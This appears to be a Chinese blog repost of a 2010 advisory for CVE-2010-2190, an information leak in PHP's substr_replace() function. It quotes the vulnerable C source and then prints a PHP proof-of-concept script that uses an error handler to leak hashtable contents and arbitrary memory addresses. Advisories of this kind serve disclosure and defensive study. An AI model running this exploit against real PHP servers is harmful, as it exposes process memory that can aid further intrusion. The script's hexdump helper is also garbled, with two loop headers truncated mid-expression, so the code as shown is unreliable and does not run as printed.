php中substr漏洞,PHP substr_replace()函数中断信息泄露漏洞

最新推荐文章于 2022-11-28 09:29:52 发布
最新推荐文章于 2022-11-28 09:29:52 发布
阅读量333 收藏
点赞数
文章标签: php中substr漏洞

发布日期:2010-05-30

更新日期:2010-06-25

受影响系统:

PHP PHP <= 5.3.2

PHP PHP <= 5.2.13

描述:

--------------------------------------------------------------------------------

CVE ID: CVE-2010-2190

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP的substr_replace()函数中存在信息泄露漏洞:

PHP_FUNCTION(substr_replace)

{

...

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ZZZ|Z", &str, &repl, &from, &len) == FAILURE) {

return;

}

if (Z_TYPE_PP(str) != IS_ARRAY) {

convert_to_string_ex(str);

}

if (Z_TYPE_PP(repl) != IS_ARRAY) {

convert_to_string_ex(repl);

}

if (Z_TYPE_PP(from) != IS_ARRAY) {

convert_to_long_ex(from);

}

if (argc > 3) {

SEPARATE_ZVAL(len);

if (Z_TYPE_PP(len) != IS_ARRAY) {

convert_to_long_ex(len);

l = Z_LVAL_PP(len);

}

} else {

if (Z_TYPE_PP(str) != IS_ARRAY) {

l = Z_STRLEN_PP(str);

}

}

if (Z_TYPE_PP(str) == IS_STRING) {

if (

(argc == 3 && Z_TYPE_PP(from) == IS_ARRAY) ||

(argc == 4 && Z_TYPE_PP(from) != Z_TYPE_PP(len))

) {

php_error_docref(NULL TSRMLS_CC, E_WARNING, "'from' and 'len' should be of same type - numerical or array ");

RETURN_STRINGL(Z_STRVAL_PP(str), Z_STRLEN_PP(str), 1);

}

如果使用不同类型的from和len参数调用了substr_replace(),就会触发E_WARNING错误。只要PHP中没有删除call time pass by reference功能,用户空间的出错处理器就可以利用这个中断更改str参数的类型。如果将其更改为整型,就会泄露任意内存;如果更改为数组,就会泄露带有重要内部内存偏移的哈希表。

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/* Detect 32 vs 64 bit */

$i = 0x7fffffff;

$i++;

if (is_float($i)) {

$GLOBALS['var'] = str_repeat("A", 39);

} else {

$GLOBALS['var'] = str_repeat("A", 67);

}

/* Setup Error Handler */

set_error_handler("my_error");

/* Trigger the Code */

$x = substr_replace(&$GLOBALS['var'], "XXXX", "XXXX", array());

restore_error_handler();

echo "Hexdump of an array\n";

hexdump($x);

/* Alternatively leak arbitrary memory address */

if (is_float($i)) {

$tmp = unpack("L",substr($x, 8*4, 4));

$GLOBALS['addr'] = $tmp[1];

$GLOBALS['var'] = str_repeat("A", 39);

} else {

$tmp = unpack("L2",substr($x, 0x38, 8));

$GLOBALS['addr'] = $tmp[1] + ($tmp[2] << 32); /* ASSUME LITTLE ENDIAN */

$GLOBALS['var'] = str_repeat("A", 67);

}

/* Setup Error Handler */

set_error_handler("my_silent_error");

/* Trigger the Code */

$x = substr_replace(&$GLOBALS['var'], new dummy(), "XXXX", array());

restore_error_handler();

echo "\n\nHexdump of zval_ptr_dtor\n";

hexdump($x);

/* HELPERS FOR LEAKING ARRAY CONTENT */

function my_error()

{

parse_str("xxxxxxxxxx=1", $GLOBALS['var']);

return 1;

}

/* HELPERS FOR LEAKING ARBITRARY ADDRESSES */

function my_silent_error()

{

return 1;

}

class dummy

{

function __toString()

{

/* now the magic */

$GLOBALS['var'] += $GLOBALS['addr'];

return "";

}

}

/* Helper function */

function hexdump($x)

{

$l = strlen($x);

$p = 0;

echo "Hexdump\n";

echo "-------\n";

while ($l > 16) {

echo sprintf("%08x: ",$p);

for ($i=0; $i<16; $i++) {

echo sprintf("%02X ", ord($x[$p+$i]));

}

echo "  ";

for ($i=0; $i<16; $i++) {

$c = ord($x[$p+$i]);

echo ($c < 32 || $c > 127) ? '.' : chr($c);

}

$l-=16;

$p+=16;

echo "\n";

}

if ($l > 0)

echo sprintf("%08x: ",$p);

for ($i=0; $i

echo sprintf("%02X ", ord($x[$p+$i]));

}

for ($i=0; $i<16-$l; $i++) { echo "-- "; }

echo "  ";

for ($i=0; $i

$c = ord($x[$p+$i]);

echo ($c < 32 || $c > 127) ? '.' : chr($c);

}

echo "\n";

}

?>

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

0b1331709591d260c1c78e86d0c51c18.png

周看看
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php字符串替换函数substr_replace()用法实例
10-24
主要介绍了php字符串替换函数substr_replace()用法,实例分析了phpsubstr_replace函数的使用技巧,具有一定参考借鉴价值,需要的朋友可以参考下
php自定义文字符串截取函数substr_for_gb2312及substr_for_utf8示例
10-22
主要介绍了php自定义文字符串截取函数substr_for_gb2312及substr_for_utf8用法,结合实例形式分析了针对gb2312与utf-8编码的自定义文字符串截取函数的实现与使用方法,需要的朋友可以参考下
phpsubstr漏洞,PHP iconv_substr()函数中断处理信息泄露漏洞
weixin_36484465的博客
03-12 236
发布日期:2009-05-18更新日期:2010-05-20受影响系统:PHP PHP <= 5.3.2PHP PHP <= 5.2.13描述:--------------------------------------------------------------------------------PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTMLPHP...
[PHP] substr占用内存谨慎使用
程序员老狼专注开发aigc或客服系统应用
05-29 242
在下面的场景使用substr的时候, 有时候会报超出内存fatal error ,当curl读取的内容过大的时候 $header_size = curl_getinfo($curl_handle, CURLINFO_HEADER_SIZE); $this->response_headers = substr($this-&g...
substr php,php substr的一个小坑
weixin_28984379的博客
03-09 103
说到今天遇到的这个坑,就得说说我开源的YurunHttp类库了。curl请求后,获取header和body,我是通过获取CURLINFO_HEADER_SIZE来进行字符串截取。截取当然用substr,于是截取body时候遇到了问题。如果网页主体内容为空时,用substr截取就相当于substr('abc', 3)这样的,照理说是截取不到,那截取不到的值是null还是false还是空字符串之前并没...
php strsub使用的坑,php substr的一个小坑
weixin_39994806的博客
03-17 253
说到今天遇到的这个坑,就得说说我开源的YurunHttp类库了。curl请求后,获取header和body,我是通过获取CURLINFO_HEADER_SIZE来进行字符串截取。截取当然用substr,于是截取body时候遇到了问题。如果网页主体内容为空时,用substr截取就相当于substr('abc', 3)这样的,照理说是截取不到,那截取不到的值是null还是false还是空字符串之前并没...
php多个内存破坏漏洞,php substr_replace替换指定位置字符与内存破坏漏洞
weixin_29028611的博客
03-11 126
php教程 substr_replace替换指定位置字符与内存破坏漏洞提示和注释注释:如果 start 是负数且 length 小于等于 start,则 length 为 0。$username = "zongzi";echo substr_replace($username,'**','1','2');定义和用法substr_replace() 函数把字符串的一部分替换为另一个字符串。语法sub...
PHP利用substr_replace将指定两位置之间的字符替换为*号
12-18
您可能感兴趣的文章:php字符串替换函数substr_replace()用法实例php使用str_replace实现输入框回车替换br的方法str_replace只替换一次字符串的方法PHPsubstr_replace将指定两位置之间的字符替换为*号php函数之子...
PHPsubstr_replace将指定两位置之间的字符替换为*号
12-18
substr_replace() 函数把字符串的一部分替换为另一个字符串。 语法substr_replace(string,replacement,start,length) 参数 描述 string 必需。规定要检查的字符串。 replacement 必需。规定要插入的字符串。 ...
C++replace()函数使用方法汇总
12-31
C++编程语言的string应用方式多样化,每一种应用方式都能帮助我们提实现特定的功能需求。在这里我们将会为大家详细介绍一下其一个比较重要的用法,有关C++ replace()函数的应用方式。 basic_string::max_size ...
php函数漏洞
h3110n3w0r1d
04-05 1764
1.intval() intval — 获取变量的整数值 说明 int intval ( mixed $var [, int $base = 10 ] ) 通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 参数 var 要转换成 integer 的...
php substr_replace取值超出字符串长度导致api无输出踩坑
qq_38883889的博客
11-28 133
php substr_replace取值超出字符串长度导致api无输出踩坑
php弱类型漏洞
bouIevard的博客
09-15 1162
题目如下 $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric在num是数字或数字字符串的时候返回1 所以这个题目要得到flag 既需要num不是数字字符串 又需要是1 但注意下面的是php里面的弱等于==而不是强等于=== 在弱等于判断机制里 会发生类型转换 1 == 1abc也是对的 可以在数字后面加上空运算符%00或者空格%20或..
php 截取字符串bug
Christine95的博客
09-23 440
php有很多截取字符串的函数,mb_substr就是其一个,不仅适用于英文还适合文截取。 但是在截取字符串,我遇到了以下bug $result = mysql_query($sql); while($row = mysql_fetch_assoc($result)){ ?> "> <?php echo mb_subst
substr是不安全的
weixin_30755393的博客
08-22 117
今天遇到一个问题,数据库保存的内容通过php在页面无法显示,如果将内容换行或加个空格或者随便加点其他内容就能正常显示。 非常的诡异,显示的内容是通过截取得到的。代码非常简单 substr($pMarketInfo['description'], 0, 150) . '...'; 原始内容是: Set on a huge 809m2 block, there is plenty...
php伪类成员属性赋值的函数,php字符串替换函数substr_replace()用法实例
weixin_29464593的博客
03-11 229
php字符串替换函数substr_replace()用法实例本文实例讲述了php字符串替换函数substr_replace()用法。分享给大家供大家参考。具体分析如下:substr_replace用于在指定字符串替换指定位置的子字符串$string = "Warning: System will shutdown in NN minutes!";$pos = strpos($string, "N...
python爬虫数据可视化-10-where条件语句-模糊查询.ev4.rar
05-31
python爬虫数据可视化-10-where条件语句-模糊查询.ev4.rar
train.csv
最新发布
05-31
train
Golang(Gin框架)+websocket 实现的多人聊天室+代码+详细文档
05-31
Golang(Gin框架)+websocket 实现的多人聊天室+代码+详细文档
PHP内置函数substr_replace参数说明
07-12
PHP的内置函数 `substr_replace()` 用于替换字符串的一部分。它的参数如下: 1. `string $string`:原始字符串。 2. `mixed $replacement`:要替换的内容。可以是一个字符串或字符串数组,用于替换原始字符串指定...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值